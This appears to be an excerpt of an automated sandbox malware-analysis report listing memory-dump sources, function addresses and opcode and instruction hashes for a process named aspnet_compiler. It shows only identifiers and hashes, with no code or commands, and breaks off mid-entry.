                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                          Function 007BF8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                          Function 007BF938 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                          Function 007C1930 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                          Function 007BF900 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                          Function 007BFA50 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                          Function 007BFA20 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                          Function 007BFAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                          Function 007BFAB8 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                          Function 007BFB50 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                          Function 007BFBE8 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                          Function 007BFBB8 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                          Function 007BFC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                          Function 007BFC48 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                          Function 007C0C40 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                          • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                          • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                          • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                          Function 007BFC30 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                          Function 007BFC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                          Function 007BFD5C Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
